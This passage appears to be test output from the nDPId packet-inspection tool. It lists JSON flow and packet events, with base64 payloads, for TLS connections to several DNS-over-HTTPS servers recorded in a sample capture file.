+00910{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":252,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348961,"flow_last_seen":946739348961,"flow_idle_time":7560000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739348961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":38018,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dnsse.alekberg.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+04400{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":253,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":946739349012,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":2958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2958,"pkt_l4_len":2924,"thread_ts_msec":946739349012,"pkt":"ZmZmZmZmRERERERECABFAAuAVvpAADYGOMgtmbtgCgAAAQG7lIKfbuPaCXxTn1AQAIO1KAAAFgMDAHoCAAB2AwPVEzRRR6mT0E92uybAnGbGZWeWVD\/m1\/eNOhfsedWm3iCCG8AdBIamvVFUtiPCGd7atl\/XGLRDF4fN5wiY+j2o\/hMBAAAuADMAJAAdACAZ+iIImd19O1rP7adwYQe9xC\/+1jN6jL9eBLofHG6SbQArAAIDBBQDAwABARcDAwtedm5F60tr1KSpSWgXMdmmX3Ys4sUEWudZbc\/GVmqkUsaepFDQQ8mcPIjegsJEHlTqywqGyBqt0c8EFI9PK3y9wMc\/+3ozr1s1L0Jd42MTaMhOndcbb8aYEnSYi\/zIVpLn6qdOkfyxUEfDDwQC7tdpz8rWkLOD8s1Gc\/+GapP01LuZUSoxJKMEPFivq1rS7ax5uSaTQJul+x0Q1A7WKBQI96lxNlKhu8S\/F6aiQdLb9bng9LygmgdlJ0IMNTAzSle754kwT44x6hxHdY+dgL3FfpB162mfDfNtflZ3mHhPTnkpYtlwwqsdseLzRBUZP3Q4Ja18aDfnLKv6lwZqUkYqVbKbxYZxo1iV+7HgYRo00AC9h97+\/fjdDvQp1\/ZlgGZVor6fI\/2UbNyKd+CKXq\/WxiWd3cfOC5mfsohQgZfh0mCkf9dr3uz3ujKCV4y2skvjk\/nvMYWaCk8YYJ09fpkBhHkvDLX34BQkxdq8SFFlf9KC0xLeicU3h\/prF3BxKbFcEuJVsTQ1IwCvvKPttu9bXK5Pot+r5ctGacxaL2PbnIguGLNO3oXuqP1Q9c+9bIOgs3SrVqvTzY6u7z71LwLT4lIRUT1tdFuzNBsI3uP36b\/9IAg3kdqQ6B86AhSq6s9YI9cVyIl6Ij\/v4hTBVX3z6+HeVN1ZOCnsTQ5pzdsr1wh7Urw2Dq8ujiDkOD+Fou6dMOYoID0SKEwKKw1eszHLhxLaCFy\/r3d7Go4MVMtt3WT79fbDbeLxIVt3hgCghutkKtcuHd5chD4oLWELh6tM9hPl+4nCK4m\/+O5cbKg6OL6jCTY\/gO0DykmoFGAjlffWT5qFPKGIHd1y6jfLFBTeg895J4XJsRYeS8WWpPvi7T\/OrrEOEoSups8MYg4y47m6jBSiviaU3Egrqb9OmbARusmAkBOc+b7sPEV3vJ7rmbEmSmp9es6Ma1hTLKZ1zLv5y87EpErdv2GmabDERgys3rQli1zICByjjT3wKTtOmnCFVus\/kEZ20ZKIT3R1SBoRFrSMK3NkxEq+liNvGGcf+EHNQ14qDPBLs0m+Amz59cCkIeFxK62ZDg\/D8+8JoEQZlyE9AWaFti+8vDVxBObTHdc9i3Kw7ewteJw63QBC9EWl8n8clagy9wb+UFjl1FNsicAfIiO1Xs\/Zye+Z2EVvEt6aOGsYYXUIiuSHHHy+OTANd5q6FtSmxH5d29V\/RRYtUF+RFNqvu7jCJbpfY4CMi\/uFQpCXgIsM\/FuZw9ietB43gXYBJPigmUjQOJrnl2aOEVZN25twSZkyFkDyfGhTbcdXECqNFF8TnC98sE4z4c
SyaAj5eIgD8KWiILJX2yoi+dB+VLGxM9ljCfyywhEqQD9FxwMPenX20RdEq43Qg2oM44SbTOcaPyRK5R1+UoArEareBxTtwbIj1\/gYPRWTkZ8pK7ELTpeDzq5dz0ptJVwSUIH0JdKkVE3RFHc7LCdWysSVUeFYgHXl28Deq1y2qizxSTQTQGj788zPkj9nRqwsew3ffxErP0pR2erOmxzmRPzUcbJ79H2yupuK1CFndSabVcPzkp0n+2KlKx3Rn8tyf\/hn5qm64LAaVaGFpUoNBQQlUEAUYg9kdMVxRV9nD92+mrKa+2JReRncweAA5LhgzrfrEPwyc1B\/FBpBxwIyV7Xy5RQehy\/n+t2tqgDOZsROSPZV\/c502uShsqQ80dFUM5RKxh0mzHQFM0OK4kAUJhq4wyFBHR892ibgw3EufqDFUX7y2fDW3v9sHJ0PjEBQf0Z+LPQlMJXmUS7wgfHtNIgpjboq9\/XXfFayEzII5Ncg7bWrTiyo4JZFWiVHcfds+TlAJ90V8nR81jNjJjiPpWGiw\/wBoLReBkDgcemdC73ykLweu4Hz14TsLOSuTZsu5EZr2HV10q+61hH6ogeRQcst3XaFzwE6kceLYfEcwH6tnp0hMB9x62cNInT6JQ8Ps6Dsa1MRUtnCTsYL1E0KIBY7R9nY7dSZJpv6\/qCWpPnVEfxATo177u2nsXiV3PW6LNV3vcyinTzbbKWNsqHSX\/Rxrwf+OdHXgpeBX43CwbB+Rl\/n0BchEVnzKV702Gf9HUv7cdBb0q\/i8hYFIFBzZttYWXxvMMCuX5vFFfZ+rdfdvsqESgmVU60GNMEWlpOcj4wiK5O4Sufp7t63lXuXFEGAyK\/zCX6bTsoTK5InJmYeoxH7z6vro\/3e6Rs6NXLtea8yb94qYkPEVBEqGEipZDsyb\/R\/lWwE43D7Aub6g9hkVbl53hLJGZnLMYjNGkky7jnCfZMKDiaQ3bMKv84lVUSDkp3sK9qeuBF1mmZVLhv9HAxir3SYBNQzWsBGcCUpO9xkV8FP0kj\/iTW\/FfLKk\/DKd+BUjaxMV2uhSSQCmVokip5q8tl9J4DEAniFz7fyP2MXZu9ul4s+9NyHUnr96E7oyJz9targa6lIbTNrabDpef+RQ95Jg3dEACMFcNChtfiB\/b3jxW+VTLzdeEUKMhmN9RiB66l3ilE2UeLuKgX3mDdaXzGma9QHxu929MG9uV3gmQHGDy5TCH2vSSxC6z2\/OmzDacBVelfY5Epw7lZBVVGZZnkHXtDZ9aRkPwQ5ycPlis7xyXgrmjnzVXCU2sPi4g8aIZETiD58CL1o5eQFVuuBNN+YXqwNw72pWFPr7n1hEhwv6Vw12CTiC6plOVTlmWo7Hq2\/pHWhiu+RR5lh+vtYdVwTRC30+fnyRct1ka9vbNMqvCrrwxYa5D5R79sdMZcHtogzlIhlvBA\/hEtCrwDCOTsOVV\/YHdG3yKWN4O6RFwnZZifYo9t6777XaaqBBnRbmAIh24x\/s0cQdV+c5CkmqhwnyVXuFfH9t0XQ1553XL2pziV2ZWgjNschuXZ58zhktYtAMF0VjgYyEW7jDxhCpc\/J+cRaztT52A0ytvkRgmQaVyJn+aLdW9sCq3AlQ8gfIfMUsOa4qrrfYi\/W6wC7p\/JpUVApLzH2mKuhH3cCajbIykaOD4hdj7uAYv5ROV\/V+1+PXMG5ia\/9hbHOgDJFO9d9IqY7KSn3C+1mBqumfNrcdhFQFiTH43iJKL7gLi6km2zN5cYKZjrmjbjv3JkWSUwYRpPDfBjgX5JiTKnp6do79w4bx6CpetzdKmLMsuX1smdlFu3kujpvbqv6a1KH6F4pTm1MQ5RJmmfgdquxg6OsIIvP\/kEDn+LVg8ZMm87yYyquFkOWwe1Uj\/Vi3kL4fPIR5niD5XVoEWohLwDdVCqKts+2P1GYyEHqQAMrqWmQegZl\/LhTQw4INPlPDF
Em0yb+KBOh00ktbHzCM3CFPGnzYO3alldd67nq954eKLkUOGB9MeSY7cUwdbulO4dr11zq3CmOecqOMxOt2f\/VIopIebzlUenef+vRdxbO4ewVSqUhsy+yoPWXBOpZPgLhhY3LxBP7ooDeCCIO0lcZB\/CBSyUEgiFK4lZ3kAGz8uFt3A\/vRHHEykEvXspKCwmakvQLGtne7shF+m0j\/3K2vxEjTMcnD1pU47tDCPXW32n5d+GKj1kQXvMBCTdCNuO1i0NSTDkuKc7j5+f6O6RyusC0fFzTP7MVdbXFBb1omPMQEuUSj0+hj0rK73sjeV5xq8OVFpFoURjJ2NwQsCAu\/jAm112150nTKknyPg+N6HqbvoOC0Wpkh7IwnBnV+fSTZjZ4AEkEeoKm"} +00952{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":253,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739348961,"flow_last_seen":946739349012,"flow_idle_time":7560000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3192,"flow_avg_l4_payload_len":1596,"midstream":1,"thread_ts_msec":946739349012,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":38018,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dnsse.alekberg.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00656{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":254,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":946739349015,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":198,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":198,"pkt_l4_len":164,"thread_ts_msec":946739349015,"pkt":"ZmZmZmZmRERERERECABFAAC4VvxAADYGQ44tmbtgCgAAAQG7lIKfbu8yCXxTn1AYAIOAngAAUbudk7Sx467B78RwxwixN7WbszxDSJth5tiFKuiBrGoB9KFJtYBVt1C9rFJk5PyiCKlQsUVoHGHAH28fXEOq226wLx4N\/Z5eAHXlqMB6V1mSenxLPr5ItjgHCvxui0hIr8CHs4BD\/dcyFi\/lJAfYyCLIMg195o3ptTftZf8UL\/yW+5j1eIJyx2wYxG1Bmojg"} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":266,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739354159,"flow_last_seen":946739354159,"flow_idle_time":7560000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739354159,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.235.81.1","src_port":44640,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00842{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":266,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":946739354159,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":339,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":339,"pkt_l4_len":305,"thread_ts_msec":946739354159,"pkt":"REREREREZmZmZmZmCABFAAFFsX5AAL0GP4sKAAABuetRAa5gAbtwXMMeYngARlAYAfbM4AAAFgMBARgBAAEUAwPEqi+8SizamcFZuiOMoqnZy7ZEtN03UH+nij+VYBL3GiAFdLPwuVYC1BfptVDzpRdMmd95Dbs0SjTzk4T9Cfoa3AAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAAClAAAAFAASAAAPZG9oLmRuc2xpZnkuY29tAAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AIAlFpvTRrkboC35Gi6Kti1ZQzFT3L63Tg7Ad2VS1Z0Nh"} +00906{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":266,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739354159,"flow_last_seen":946739354159,"flow_idle_time":7560000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739354159,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.235.81.1","src_port":44640,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.dnslify.com","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+04672{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":267,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":946739354179,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":3168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":3168,"pkt_l4_len":3134,"thread_ts_msec":946739354179,"pkt":"ZmZmZmZmRERERERECABFAAxSLpJAADQGQGu561EBCgAAAQG7rmBieABGcFzEO1AYA+rX7QAAFgMDAHoCAAB2AwNebHWZixx0UeVpRBPFfxfOwpvxbfyV+ENeQi\/Un6YmQyAFdLPwuVYC1BfptVDzpRdMmd95Dbs0SjTzk4T9Cfoa3BMCAAAuACsAAgMEADMAJAAdACB1L93FSUikFZRCKYl+OoNXGHhZBDYuCiNIjz\/6VCChXhQDAwABARcDAwAgdZlJOwY6+pChCwvT27tLGZnet+yerzqND\/r13r3OLdQXAwMKE5aV9MRHEDXFawxN2Z6ZXTlxr30g5cib8A44fkQ64oQQPk\/j2rM6co+1b6nblkLeVstFbtdteXwKa840eY9TBhZcpregM8Gpq1oOWaP3aNoy3x0m7PtgdMXWTRJ7rBzMj95YpQgnRNENvlH3xRXTNJuz0OfawrfLZMK40dTY8qdEtSvVWaOv58OBFTZzds8x7Jv0lUMqTicPkVrWkLGPasMnh+a2IVbs4dzr6AhsFrB+RZ1Cwi3B7S6zzr3HKx3FQGuVtHh19izb6w3PsdZ173iclTsS5Bteswb+0EdgltfMU7tCCWlZhlMw5cbiqzX6GLMdzRL4kMNW6gZ94dTc92SBIwy+nEoGbWZhqTeDuHiAUARf+gliy5YoFjW\/PRAypf5PMRtEZClIDkjH3prUoCFGtLR5uf4Ro0aKo3ih\/KCyAGbVEIvG4bDrcfRxO0cIiVz1g0D8AUPbTDsJO+EPspEYZgIriHIBYFx\/k\/flIHH3EjcpqIe+X8XzMf\/XqWL46qAhN1cBUZXyVc3ZIhpeJ7ZcaAbPdH2pnTMTM+2Go4igirnaKWq3AflEDkSSdueX+UQOyAZUkd6Z\/x1Mwq9Tb7hXL6vtOYcRcpywMzYkakngWETbQss0CojZbN6WAPS\/E+Yya6CgGI5Mt3dulPgu8jNdumumeB1P2glp9qwQHuvHZ1QS+cPtS5x1raYCp7T5sLegZ7EBanNjOEnVAU4IhPuW0ciFUM9Mj\/BzgDWE\/hUdNhPhhQjiaUBq7VyAXKWvyO4Dx2Fel0gu0u32uA\/SHIYv4dBAj17ghhBMv+sGNC8NMtNWhv9aqIp0FgaNgTJ0u6ZahzAQoaba8gKEvhS9MXrxWiCXAHjt1VsuslTiTWmDXRn19O8C7v9DYdY\/x+ZHYaRltrJ+iDZDtT011nG9MjUMy2gT88psevKL0b5pLEr8mJZKye0N3pZbPCi7mofLMsInUgCJYAIJe6z94EV17S9g5MdytiaRjgrDRHDrubquER\/+3IoTeZlSES8Dx7zlXZ1xB0O+hR5nXJGyIskMCiVwzAersZ9n8hiUAXpNADMi79ZOaHWxepo2ogdjtLk6L5RJOzsW\/4O9s\/bE+P+1smYJ8Xz\/vrKCk0smpZMpgO1UV8s8gCIdy3Fy602DcQY72cCEk\/bea7v72CbMggpz6myeQuHNx9T5ZrAHxOyDqp4pkMAhTfD0dC3xg5zkOkSQr5pJx6ievuDl8+wenRgTssVF8J1H1XRwU56YwKhMsgqTn8eD+cywTh5zCo9dNvl9Zf
HWmV3Mdg4aJz1dYzmdkUhSu46Md5G4HmOnLwI\/XQbyhHcZ2WUU9mvD9BvjP9kn2RjUXcRT+d\/cwjt2Esxb2ENHpq2bs5raN\/CIbWH\/kUQRUUCpYL9CdmiBZpRtJPrOXy6iWAKofUme88d2tr7pTpEzcTLRU5BoYhPgOVQbcXw1q3yaTUVQB4Wvp1Zu7ruywhz7ujDaUupe4ypGeBHoMNq\/GonbnedBdKUd5q1Hau\/cYgTRejjU\/rutBsmd1TsWFTtw4Narsizl07q94yxV1+nrTG1gDq+RefJI3JM3SA8ccXZmrC6\/9FsgFjt+2cDWt4JB10cFksHu2\/ml\/dASyc2jx2disClcngjvd0YpBOF1xYxILWWqUHc2SCZLZ2Aroa1pMW21jKFGB4Ar1xpSSuVVcPsSSozoKj4\/j0FvDgtwJoY1rK5ezs7yUOh0iG7\/TmlCa9VwcqKlbka3ucK+EV23eB8BAhdfkU1ZRvrzop+h56cTHnAqdzA+huEFkYic20FxEaceaf8SUoyM1\/uxur0377YEwqxCUCLmkpdjf2hKaG2o6w6dX9vCExiNhM2Jlol1IlMb4fWmsojPIiIMoMr4vCBzw+JJJUMfUwOy6sleF+nP5muuQ5rVTMwbb+OCuGE2jDpUYai822DbFN3NNQkq3i2+StVf9WCISeMMwfPk+unXE38SgIx+97\/gooknQY70IX3TsgQKFcc1SEcM6rgwk5pR4rwHfer1xQNsM1RKZGf8xeZa+ag2yg\/IxDT4LymayHchHxdaigJz4AcxjPrNuXaoi2s3E1xPh2H1clb\/ZJJwrzY7BZjc1TQovWjOw6wm8GHMHRYPWaLpFhaLJX6iixp0BBfYBFzNmIvcsaGPhpGQIWG8LNHl1vR+XYpcJzMWemerQw5\/TiIwzhe4xLQ3Ee69tOX2fKhT1GAVUyB0oeuLgjlb0FpWzQ\/lyORIy\/GJNnRuRgdZy8RNv03eZWNeLTHNU8amNvoSqoCJx28QcG4ZFWjkiBlGlisQg9MS7LfxB5YDcM35ukvbr57gX64nw00G3GJe5JnYnqeIHNIuWQI7nvVvBHP3PfWTKRa21nyK90D70j+bxIjA68ylRrcDSlrq9zK60l62NWR551fMFXxuoHTFc7qQ+K4J0ESDuqw7x47BFgsRGeVuVNYexUC0TU1lBMwcu9BGg+0G0+duPvOP3aW+jzZAhqEMopcx946w0BTw\/+bJ5qiZX+nSvNF+IzKPfnXq7G+okmmjpg\/ianwcwtjvgrAC4pnZGY+m\/27CyJiTEi9fYvN2T1KGpFt19LfH\/UKHKmZdKRHhHpgpAUwyz0ixR7JCGsZBCNp7SmZtoObLBfKyYFLS1OdeJn33VC7QU5ZIB0TIGMOnasD1IIceFavDDD1uWjFat9U8TSvdQkrVOP0H+iiog+bscrfkzNeLsrOj5JaS96ZDARUESAXVBQE+wq3Z0J6WrNdNJCanh0R13lIIfbBO3tp1JQaYJcU43NTOBatEStIgR6pggN4HF+DO2dNPqB6DJlllwkNWiMSwaSg\/Qokswn+fLJvn7pPXb8ILKczNLht2jz9aEp0+I8QfJ9sljCRmG\/qdZknc3MVkUZCxQWgeYvnw16OCgKVrO7aXg97ZXgFQywgIz4XcG4cQlmlUgZ5vBckLpEq1wb47O2DC7oYeIkB7WvMn7pIP5qKMmIewtCOip18QV5mNZQ7kfdTHrJyhNEAXbfaMkBbJyAVJGCBIYwvhIF13Izb7B6Cmnolxq1r5eurWQOB44xUuJop6m5Nm5hxmATag\/xOQnBP8r2vNMxUihmUT8anHH3UfjXAY915xtFCA13IdATjUK5r\/nOjWuYELtJmgRJ2oeyJFl+xU3enOifKqvSW9w3npBMuO6+ND+s2KXgdXZpDonBBs70SsK8NzgIT\/8A0se3txfhbwpY2EseDOLiVbMtTN8WhjrhnZpDEjzwdCV8jV8k
i7+xTW6Ae32nBN9uRAZ20gpXPNrrgk+1oPaXal74NAuojgux90nmy7fGQvJ\/CCkJUFP2+xt7moAmNV6Bvh9GIV51tdhbag9+AtGmBI8WUGXz9QPwduT4nOO+Ia6cTJuP1+CL3tb+p6ijB1Jg583CQ8vtkm3Pw8NXcvYMcBOIpsKkRrBsD67+irg6nQFwMDARkSIsFlIX96rBVOSHF8j3nD4OzTmAKQfrZ20qhfNZw8PH0q41dWeUeDXwstCBpDPbSnxrC2ED\/1S7AKbK3628b0BuTXrCb9vI9IIN\/fjnNzXGCyCTfNGyQC7Z2s3ZZgGilAyQTgWS6IBv0X\/cXimIPEtNGeEgUfHp2ZiHChqtgUwdJbYZhYRpk9Vh4PP\/G\/geKDMJuF9LkfMNZa2A5\/kJwnnbAN+9JGdzxyQUZGqq8DCQqxQ4uAbnIJmcLNJBx9PHCzhhj8vk0E7hUaqEkvClX1iiIhNhFlmQ9FsqBvx5KYUvaVI86YI314BKZUdBn0Gn9Psqh3g3PCqYbuhSA+KXAHAB6ifkPpQbZxhpKA+yQN\/aKxaWBvyR8fvBcDAwBFUlHyM0i8aQGJ+PRPScWQmM6JruXTVxzLP2v5t10WMRjAfhtdK+kbZwmOwuBqS0fXovjROfDM5rGu95fh\/DYXUBWZSAER"} +00948{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":267,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739354159,"flow_last_seen":946739354179,"flow_idle_time":7560000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":3114,"flow_tot_l4_payload_len":3399,"flow_avg_l4_payload_len":1699,"midstream":1,"thread_ts_msec":946739354179,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.235.81.1","src_port":44640,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.dnslify.com","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00570{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":268,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":946739354182,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":946739354182,"pkt":"REREREREZmZmZmZmCABFAAB4sYBAAL0GQFYKAAABuetRAa5gAbtwXMQ7YngMcFAYAfXMEwAAFAMDAAEBFwMDAEWXq32pwHEzhcGDp\/NKLjvxgMAkksKxKcFIOFCDodEb90S6h8Gu0G\/BLuFfZ5sttQB7HESBT0tBjYEfHL61VthvR6QOjls="} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":287,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739374011,"flow_last_seen":946739374011,"flow_idle_time":7560000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739374011,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"116.202.176.26","src_port":43106,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00844{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":287,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":946739374011,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":339,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":339,"pkt_l4_len":305,"thread_ts_msec":946739374011,"pkt":"REREREREZmZmZmZmCABFAAFF9DpAAH4GIdcKAAABdMqwGqhiAbtWR3H7NJTy0VAYAfbm2AAAFgMBARgBAAEUAwO\/FCTCx\/QYlyW+S6EGE0TFYQ1H3k3FO+5pvJMM4NWMBSCY7MF+HV8NsAFc82xlqHj0YcQW9bewwKxZQwscQJJKpgAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAAClAAAAFAASAAAPZG9oLmxpYnJlZG5zLmdyAAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AIOxloY7MOWvSgZ3hQaojp9inJ84Sw+igf7hW9Y3pU+ch"} +00908{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":287,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739374011,"flow_last_seen":946739374011,"flow_idle_time":7560000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739374011,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"116.202.176.26","src_port":43106,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.libredns.gr","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+04697{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":288,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":946739374036,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":3179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":3179,"pkt_l4_len":3145,"thread_ts_msec":946739374036,"pkt":"ZmZmZmZmRERERERECABFAAxdEw5AADYGP+x0yrAaCgAAAQG7qGI0lPLRVkdzGFAYAfXx8AAAFgMDAHoCAAB2AwMfdsQbzuiYRNDg0SBjCCwcHmnTX\/WaALeQBUBykWdcaiCY7MF+HV8NsAFc82xlqHj0YcQW9bewwKxZQwscQJJKphMCAAAuACsAAgMEADMAJAAdACCFS52dOnPWMZ+6KGOu9y\/QLNkNywSlNldrBcP9ygUsJBQDAwABARcDAwAkRYbUEe0KLtMYBo7DwIYWcyipqqBN\/bxVehyh0Sw6cb936jKFFwMDChoofwyGB1vpwXv7Xn4hXSbG1vtIeMernYPn5eAfJWckDiE1Vl5RxqW26TSWUTfmtG\/80SN\/HcC8sF8BZiFAAmCY47UJ7uXvVoDqw8BmwUzQhTAJ8CR9FaoGVeJsM5UnR3QsIEHqP5KqlB9iD+UdFFEShzmfIEBTbyB2lP4pQWBOWz2wOPIXZhQnKMJCxu1mnXifSB+KRolJ9fD2dQ4Cx5+85+F56fGG9StYfwFmGPIeJARJjwh49nZDI4iYWv+ddPBM2\/KJRuF+1TvTRam5R+I0m2+MFl1IOG\/mGs22lUpFRiEafHau8IgYwLtIsVJVRXeEF23eSSLjZSGlI+95kanzpb7Gq+bxaPB\/4KE\/EZB\/HHORaklfdEzQyROMT29wGcN987isDVey45rLfbLMKOZqZTAfIY9fCmEJfoMGXsfxScuGJL3kk9ktG5XOrDaDe+Mw8iBMs6aCgsJWCKp9AlmnI6jM+Pkj5pJEm1bom4ksHEDAz1NZ0ftN\/sVLZn9Ug2C7F7lT1GzkA6PKlKc6EZ2z5CZ6jJ2Z6Y6MlAZziPoOQu4qTh3J+nE8GcgGOJ+4zh9BbyrU\/zs1GjsbXVkHAo7jDaYOsfbK6OwpKfl4fhdC60RX1KjskIAX35OHA\/IXKzAnkgHHInCPGyjRoDeCN\/xxIMzVFrKXTCwf2SPOaQSeCd\/JvCgSVj\/dHhq8zdYnlFf+z9VXpf9xqp8dTGqqOXUGF